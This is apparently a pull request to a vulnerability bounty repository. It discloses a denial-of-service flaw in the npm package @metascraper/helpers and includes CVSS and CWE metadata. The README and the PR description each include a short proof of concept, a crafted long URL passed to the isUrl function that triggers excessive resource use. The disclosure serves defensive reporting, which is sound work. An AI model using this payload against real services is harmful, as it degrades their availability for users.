### PR TITLE
Denial of Service in metascraper-helpers

### DIFF
--- a/bounties/npm/metascraper-helpers/1/README.md
+++ b/bounties/npm/metascraper-helpers/1/README.md
@@ -1,0 +1,16 @@
+# Overview
+
+A library to easily scrape metadata from an article on the web using Open Graph, JSON+LD, regular HTML metadata, and series of fallbacks.
+
+Affected versions of this package are vulnerable to Denial of Service. An attacker providing a very long string to `isUrl` function in `packages/metascraper-helpers/index.js` can cause a Denial of Service.
+
+# PoC
+
+```node
+const { isUrl } = require('@metascraper/helpers')
+
+const targetUrl = 'http://github.com.asdasdasd.asdsadasdsadsad.asdasdsad.asdsadasdsa.sadasdsadas.dasdasasdasd.432asdas3423.3423423423.234234243.234234234.23423423.24234.'
+
+if (!isUrl(targetUrl)) {
+      throw new Error('INVALID_URL')};
+```

--- a/bounties/npm/metascraper-helpers/1/vulnerability.json
+++ b/bounties/npm/metascraper-helpers/1/vulnerability.json
@@ -1,0 +1,52 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-06-24",
+    "AffectedVersionRange": "*",
+    "Summary": "Denial of Service",
+    "Author": {
+        "Username": "hbkhan",
+        "Name": "Habib Ullah"
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "metascraper-helpers",
+        "URL": "https://www.npmjs.com/package/@metascraper/helpers"
+    },
+    "CWEs": [{
+        "ID": "400",
+        "Description": "Uncontrolled Resource Consumption"
+    }],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "N",
+        "I": "N",
+        "A": "H",
+        "E": "P",
+        "RL": "W",
+        "RC": "C",
+        "Score": "7.5"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/microlinkhq/metascraper/tree/4590fdf48eec95cb01082a7232104a4c5e90e2f9/packages/metascraper-helpers",
+        "Codebase": [
+            "JavaScript"
+        ]
+    },
+    "Permalinks": [
+        "https://github.com/microlinkhq/metascraper/blob/4590fdf48eec95cb01082a7232104a4c5e90e2f9/packages/metascraper-helpers/index.js#L76"
+    ],
+    "References": [
+        {
+            "Description": "GitHub Issue",
+            "URL": "https://github.com/microlinkhq/metascraper/issues/281"
+        }
+    ]
+}


### PR DESCRIPTION
## ✍️ Description

metascraper - A library to easily scrape metadata from an article on the web using Open Graph, JSON+LD, regular HTML metadata, and series of fallbacks.

Affected versions of this package are vulnerable to Denial of Service. An attacker providing a very long string to `isUrl` function in `packages/metascraper-helpers/index.js` can cause a Denial of Service.

# PoC

```node
const { isUrl } = require('@metascraper/helpers')

const targetUrl = 'http://github.com.asdasdasd.asdsadasdsadsad.asdasdsad.asdsadasdsa.sadasdsadas.dasdasasdasd.432asdas3423.3423423423.234234243.234234234.23423423.24234.'

if (!isUrl(targetUrl)) {
      throw new Error('INVALID_URL')};
```

## 💥 Impact

An attacker providing a very long string to `isUrl` function can cause a Denial of Service.

## ☎️ Contact

Yes!  [here](https://github.com/microlinkhq/metascraper/issues/281)
## ✅ Checklist

<!-- Please put an `x` in each box to confirm you have completed the checklist. -->

**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_


